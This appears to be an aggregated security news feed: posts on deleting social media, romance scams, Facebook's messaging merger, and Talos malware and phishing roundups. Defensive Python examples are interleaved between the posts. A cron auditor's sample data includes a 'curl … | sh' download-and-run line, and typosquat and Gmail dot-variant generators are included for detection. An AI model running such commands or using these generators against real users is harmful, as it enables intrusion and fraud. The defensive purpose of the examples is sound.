Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.

Facebook

Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.

Twitter

Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.

Instagram

Time to permanent deletion: Immediately!

Snapchat

Time to permanent deletion: 30 days

Google+

Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, you still can.

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the very things that make social media useful to us are the reasons regular consumers should take a beat and weigh the benefits against what they expose.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Waiting for Federal Data Privacy Reform? Don’t Hold Your Breath.

Despite a litany of high-profile data breaches, federal action on data privacy is unlikely to go anywhere in 2019 as partisanship and lack of technology literacy complicate Congressional action.

The post Waiting for Federal Data Privacy Reform? Don’t Hold Your Breath. appeared first on The Security Ledger.

A week in security (February 4 – 8)

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

Sarah, a single mom in her late 40s, well-educated and attractive, had been talked into joining a dating site by her teenager the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.


Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story is not the story of a desperate, clueless person or a lonely older woman. Scammers target good people who still believe in and value love and companionship, and the pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI), confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams rank among the costliest online financial crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling, or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to share any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date, and carry pepper spray or a taser for physical protection. Go the extra step and turn on Friend Finder or a location app that allows your safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Facebook Acquires Visual Shopping Startup To Bolster AI Work

Facebook says it has acquired visual shopping and artificial intelligence startup GrokStyle in a move to bolster the social-media company's own AI work. From a report: GrokStyle's technology, which was integrated into Ikea's mobile app, was simple in practice. A user takes a picture of a piece of furniture and the technology would match it to similar products that could be purchased online. On its website, GrokStyle said it is "winding down" its business, but that it is "moving on as a team" along with its technology. The company didn't disclose it's joining Facebook.

Read more of this story at Slashdot.

Cyber Security Week in Review (Feb. 8)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Attackers continue to exploit a security hole in GoDaddy.com domains. The flaw let anyone with a GoDaddy account take control of dormant domains parked there without proving ownership, and then send malicious email from those legitimate domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
  • Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. Gmail ignores periods in the username part of an address, so “j.ohn@gmail.com” and “jo.hn@gmail.com” are the same inbox. By sprinkling dots through one address, attackers can mint many so-called “dot emails” that look distinct to the services they sign up for while every reply and confirmation still lands in a single mailbox they control, letting them scale their spam and fraud operations. 
  • Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Filipino-backed, politically motivated pages.
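The dot trick is easy to both reproduce and defeat. The following is an added example (not code from Talos or Google) that enumerates every dotted spelling of a Gmail address and then canonicalises addresses the way Gmail delivers them, which is the check a signup form or abuse pipeline needs to collapse the variants back to one inbox. It assumes only the documented Gmail behaviour: dots in the local part and anything after a plus sign are ignored, and googlemail.com is an alias of gmail.com.

```python
import itertools
from typing import Iterable, Iterator, Set

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_gmail(address: str) -> str:
    """Return the mailbox that Gmail actually delivers `address` to.

    Gmail ignores dots in the local part and anything after a '+', and
    treats googlemail.com as an alias of gmail.com. Two addresses with the
    same canonical form land in the same inbox, however different they
    look to a signup form or a filter keyed on the raw string. Non-Gmail
    addresses are only lowercased: other providers do not ignore dots.
    """
    address = address.strip().lower()
    if address.count("@") != 1:
        raise ValueError(f"not a single-@ address: {address!r}")
    local, domain = address.split("@")
    if domain in GMAIL_DOMAINS:
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def dot_variants(address: str) -> Iterator[str]:
    """Yield every dotted spelling of a Gmail local part.

    This is the spammer's side of the trick: for a local part of n letters
    there are 2**(n-1) spellings, all delivered to the same inbox.
    """
    local, domain = address.lower().split("@")
    local = local.replace(".", "")
    gaps = len(local) - 1          # positions where a dot may be inserted
    for mask in itertools.product((False, True), repeat=gaps):
        pieces = [local[0]]
        for ch, dot in zip(local[1:], mask):
            pieces.append("." + ch if dot else ch)
        yield "".join(pieces) + "@" + domain


def distinct_inboxes(addresses: Iterable[str]) -> Set[str]:
    """Collapse a batch of signup or sender addresses to the inboxes behind them."""
    return {canonical_gmail(a) for a in addresses}


if __name__ == "__main__":
    variants = list(dot_variants("spam@gmail.com"))   # constructed sample address
    print(len(variants), "spellings, e.g.", variants[:3])
    print("inboxes behind them:", distinct_inboxes(variants))
```

Keying rate limits, blocklists and "one account per email" rules on `canonical_gmail()` rather than the raw string is what removes the spammer's multiplier; the raw form should still be stored so mail is sent to the address the user typed.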

From Talos


  • An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
  • Cryptocurrency miners and trojans led malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered most often last year. Rules that protect users against miners and trojans were among the most frequently fired.

Malware roundup


  • A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan gains boot persistence by adding entries to the local cron scheduler, and can run shell commands and execute downloaded files.
  • Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers exploited weaknesses in the SS7 telephone signalling network to intercept users’ phone calls and text messages, including the one-time codes banks send by SMS, and used them to get into accounts. The U.K.’s Metro Bank was specifically targeted in the most recent campaign. 
  • New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018. 
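Cron is a favourite persistence spot for Linux backdoors like the SpeakUp item above, and it is also easy to audit. The block below is an added example, not code from Talos or from any SpeakUp analysis: it parses system-crontab lines and flags entries that match generic persistence patterns (boot-time jobs, executables in world-writable directories, downloads piped into a shell, bare-IP URLs, base64 decoding). The crontab text and the 198.51.100.7 address are constructed for the demo; the heuristics are generic and are not SpeakUp indicators.

```python
import re
from typing import Dict, List

# Constructed sample of a system crontab: two stock Debian entries and two
# that look like a downloader planting persistence. Not taken from any sample.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
@reboot root    /tmp/.X11-unix/.update >/dev/null 2>&1
*/5 *   * * *   root    curl -s http://198.51.100.7/payload.sh | sh
"""

# (pattern, reason) pairs applied to the schedule and the command of each entry.
SUSPICIOUS = [
    (re.compile(r"@reboot"), "runs at boot"),
    (re.compile(r"(^|[\s/])/(tmp|dev/shm|var/tmp)/"), "executes from a world-writable path"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "pipes a download straight into a shell"),
    (re.compile(r"(?:https?|ftp)://\d{1,3}(?:\.\d{1,3}){3}"), "fetches from a bare IP address"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an embedded payload"),
]


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split system-crontab lines into schedule/user/command; comments are skipped.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field after
    the five time fields; @-style schedules collapse those five into one.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            schedule, user, command = line.split(None, 2)
        else:
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue  # malformed line; a stricter tool would report it
            schedule, user, command = " ".join(fields[:5]), fields[5], fields[6]
        entries.append({"schedule": schedule, "user": user, "command": command})
    return entries


def flag_persistence(text: str) -> List[Dict[str, object]]:
    """Return the entries that trip one or more heuristics, with the reasons."""
    hits = []
    for entry in parse_crontab(text):
        reasons = [why for rx, why in SUSPICIOUS
                   if rx.search(entry["command"]) or rx.search(entry["schedule"])]
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in flag_persistence(SAMPLE_CRONTAB):
        print(f"{hit['schedule']:<12} {hit['user']:<6} {hit['command']}")
        for why in hit["reasons"]:
            print("    ->", why)
```

On a real host the same function would be run over `/etc/crontab`, every file in `/etc/cron.d/`, and each user's spool under `/var/spool/cron/` (the spool format has no user column, so the parser would need a flag for that); the reasons list is meant for a triage queue, not for automatic removal, since legitimate jobs occasionally match one pattern.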

The rest of the news


  • Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The project aims to be an improved version of Google Chrome’s Site Isolation feature, which puts each site in its own process so that a Spectre-style side channel in one tab cannot read memory belonging to another site.
  • The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public. 
  • Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to execute arbitrary code in the context of a privileged process on the victim’s device. Google says there’s no evidence of the bug being exploited in the wild.


Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey of Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists wavered between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffett, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

Johns Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13 to install the “Facebook Research” app on their own devices, an app distributed under a certificate intended strictly for Facebook’s internal employee apps. Facebook pulled the app, but Apple had extra repercussions in mind: It revoked Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company build a modified version of iOS that would let the FBI bypass the passcode protections on an individual iPhone. Such a tool, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple closed off the attack through an iOS update.

Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.

Facebook Ordered To Stop Combining WhatsApp and Instagram Data Without Consent in Germany; Company Says It Needs That Data To Fight Terrorism and Child Abuse

Facebook has been ordered to curb its data collection practices in Germany after a landmark ruling on Thursday that the world's largest social network abused its market dominance to gather information about users without their consent. From a report: The order applies to data collected by Facebook-owned platforms like WhatsApp and Instagram, but also third-party sources that Facebook uses to flesh out its advertising profiles, including those of non-users. The Bundeskartellamt, or Federal Cartel Office (FCO), has given Facebook one month to appeal the landmark decision, which comes after a three-year investigation. If the appeal fails, the tech company will have to ensure these data sources are not combined without consent within the next four months. Although the ruling only applies within Germany, the decision could influence regulators in other countries. Gizmodo adds: Facebook insists that combining all of that data is actually great. In fact, the company says, it's keeping everyone safe from stuff like terrorism and child abuse. From Facebook's statement this morning: "Facebook has always been about connecting you with people and information you're interested in. We tailor each person's Facebook experience so it's unique to you, and we use a variety of information to do this -- including the information you include on your profile, news stories you like or share and what other services share with us about your use of their websites and apps. Using information across our services also helps us protect people's safety and security, including, for example, identifying abusive behavior and disabling accounts tied to terrorism, child exploitation and election interference across both Facebook and Instagram."

Read more of this story at Slashdot.

Historical OSINT – Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious Domains Portfolio

With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of malicious releases, including a variety of typosquatted domains, it shouldn't be surprising that hundreds of thousands of users continue falling victim to fraudulent and malicious malware- and exploit-serving schemes. In this post I'll profile a currently active fraudulent and malicious typosquatted domain
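Typosquatting works because a registered look-alike label (a dropped letter, a swapped pair, a fat-fingered neighbour on the keyboard) is accepted by users as the brand. The generator and classifier below are an added example, not code from the post above or from its author: they enumerate the common single-edit variants of a brand label, fall back to edit distance for multi-character squats such as "faceb00k", and flag a brand name that appears as a subdomain of someone else's domain. The domain names fed in are constructed for the example; the "second-to-last label is the registrable domain" rule is an assumption that a real tool would replace with a public-suffix list.

```python
# Keyboard-adjacency table for a US QWERTY layout (letters only).
QWERTY = {
    "q": "wa", "w": "qase", "e": "wsdr", "r": "edft", "t": "rfgy", "y": "tghu",
    "u": "yhji", "i": "ujko", "o": "iklp", "p": "ol", "a": "qwsz", "s": "awedxz",
    "d": "serfcx", "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "j": "huikmn",
    "k": "jiolm", "l": "kop", "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb",
    "b": "vghn", "n": "bhjm", "m": "njk",
}


def typosquat_candidates(label):
    """Single-edit typosquat variants of a brand label: omission, doubled letter,
    keyboard-adjacent replacement or insertion, and adjacent transposition."""
    out = set()
    n = len(label)
    for i in range(n):
        out.add(label[:i] + label[i + 1:])                    # omission
        out.add(label[:i] + label[i] + label[i:])             # doubled letter
        for adj in QWERTY.get(label[i], ""):
            out.add(label[:i] + adj + label[i + 1:])          # fat-finger replacement
            out.add(label[:i + 1] + adj + label[i + 1:])      # insertion after char i
    for i in range(n - 1):
        out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition
    out.discard(label)
    return out


def levenshtein(a, b):
    """Edit distance, used to catch multi-character squats the generator misses."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_domain(domain, brands=("facebook", "twitter"), max_distance=2):
    """Return (brand, reason) when `domain` looks like it impersonates a brand, else None.
    Assumption: the registrable label is the second-to-last DNS label. That is wrong
    for multi-part public suffixes such as co.uk; use a public-suffix list in production."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    registrable = labels[-2]
    for brand in brands:
        if brand in labels[:-2]:
            return (brand, "brand used as a subdomain of another domain")
        if registrable == brand:
            return None                                   # the brand's own domain
        if registrable in typosquat_candidates(brand):
            return (brand, "single-edit typosquat")
        dist = levenshtein(registrable, brand)
        if dist <= max_distance:
            return (brand, "edit distance %d" % dist)
        if brand in registrable:
            return (brand, "brand embedded in label")
    return None


if __name__ == "__main__":
    # Constructed sample domains; none of these is a real observation from the post.
    for d in ("facebook.com", "facebok.com", "faceb00k.com", "twiter.com",
              "facebook-login.com", "facebook.com.login.example", "example.com"):
        print(d, "->", classify_domain(d))
```

The candidate list is the same set a squatter enumerates before registering, so the practical use is twofold: run it against a new-domain feed to spot registrations as they appear, and run it against your own brand to pre-register the most likely variants.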

Phishers Leveraging Google Translate to Target Google and Facebook Users

Phishers are leveraging Google Translate in their attempts to steal the login credentials for users’ Google and Facebook accounts. Larry Cashdollar, a member of Akamai’s Security Intelligence Response Team (SIRT), received an email in early 2019 informing him that someone had accessed his Google account from a new Windows device. On his phone, the email […]

The post Phishers Leveraging Google Translate to Target Google and Facebook Users appeared first on The State of Security.
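The trick behind this campaign is that Google Translate will render any page you hand it in its `u` query parameter, so a link to translate.google.com shows a Google hostname in the address bar while the credential form actually comes from the attacker's server. The unwrapper below is an added example, not code from the Akamai research or The State of Security: it peels the translate wrapper (bounded, so a nested chain cannot loop), then judges the real hostname against the hosts the brand legitimately uses. The sample link and the `login.example` hostname are constructed for the example.

```python
from urllib.parse import urlparse, parse_qs

# Hosts that serve Google Translate's "translate this page" proxy.
TRANSLATE_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}

# Constructed sample: a translate-proxy link whose target is a look-alike hostname.
SAMPLE_LINK = ("https://translate.google.com/translate?hl=en&sl=auto&tl=en"
               "&u=https%3A%2F%2Faccounts.google.com.login.example%2Fsignin")


def unwrap_translate(url):
    """Return the page Google Translate was asked to render (its `u` query
    parameter) when `url` is a translate-proxy link; otherwise return `url`."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in TRANSLATE_HOSTS or host.startswith("translate.google."):
        target = parse_qs(parsed.query).get("u")
        if target:
            return target[0]          # parse_qs already percent-decodes
    return url


def final_destination(url, max_hops=5):
    """Peel nested translate wrappers; the hop limit stops a crafted chain from looping."""
    current = url
    for _ in range(max_hops):
        inner = unwrap_translate(current)
        if inner == current:
            break
        current = inner
    return current


def assess_login_link(url, brand_hosts):
    """Classify a link that purports to lead to a brand's login page.
    brand_hosts: hostnames the brand legitimately uses (subdomains are accepted)."""
    dest = final_destination(url)
    host = (urlparse(dest).hostname or "").lower()
    legitimate = host in brand_hosts or any(host.endswith("." + h) for h in brand_hosts)
    if legitimate:
        return ("legitimate-host", host)
    if dest != url:
        return ("foreign-host-behind-translate", host)
    return ("foreign-host", host)


if __name__ == "__main__":
    print(assess_login_link(SAMPLE_LINK, {"google.com"}))
    print(assess_login_link("https://accounts.google.com/signin", {"google.com"}))
```

Note that the suffix test is done on the unwrapped hostname, so `accounts.google.com.login.example` fails the check even though it begins with the brand's real hostname; comparing on prefixes is the mistake this campaign relies on users making by eye.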

How to Delete Accidentally Sent Messages, Photos on Facebook Messenger

Ever sent a message on Facebook Messenger and immediately regretted it, fired off an embarrassing text to your boss late at night in the heat of the moment, or accidentally sent messages or photos to the wrong group chat? Of course you have. We have all sent drunk texts and embarrassing photos that we later regret but are forced to live with. Good news,

Five in a Row: S&P 500 Extends Rally on Huge Earnings Beats from Estee Lauder, Ralph Lauren

U.S. stocks extended their rally on Tuesday, as positive earnings surprises from a pair of discretionary companies propelled the S&P 500 to two-month highs. Crypto coins pivoted slightly lower in afternoon trading, with Stellar, IOTA and Tron losing strength. Rally Continues The large-cap S&P 500 Index rose 0.5% to 2,737.70, its highest settlement since early […]

The post Five in a Row: S&P 500 Extends Rally on Huge Earnings Beats from Estee Lauder, Ralph Lauren appeared first on Hacked: Hacking Finance.

Facebook Now Lets Everyone Unsend Messages For 10 Minutes

Facebook has finally made good on its promise to let users unsend chats after TechCrunch discovered Mark Zuckerberg had secretly retracted some of his Facebook Messages from recipients. From a report: Today Facebook Messenger globally rolls out "Remove for everyone" to help you pull back typos, poor choices, embarrassing thoughts, or any other message. For up to 10 minutes after sending a Facebook Message, the sender can tap on it and they'll find the delete button has been replaced by "Remove for you", but there's now also a "Remove for everyone" option that pulls the message from recipients' inboxes. They'll see an alert that you removed a message in its place, and can still flag the message to Facebook, which will retain the content briefly to see if it's reported. The feature could make people more comfortable having honest conversations or using Messenger for flirting since they can second-guess what they send, but it won't let people change ancient history. The company abused its power by altering the history of Zuckerberg's Facebook messages in a way that email or other communication mediums wouldn't allow.

Read more of this story at Slashdot.

Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

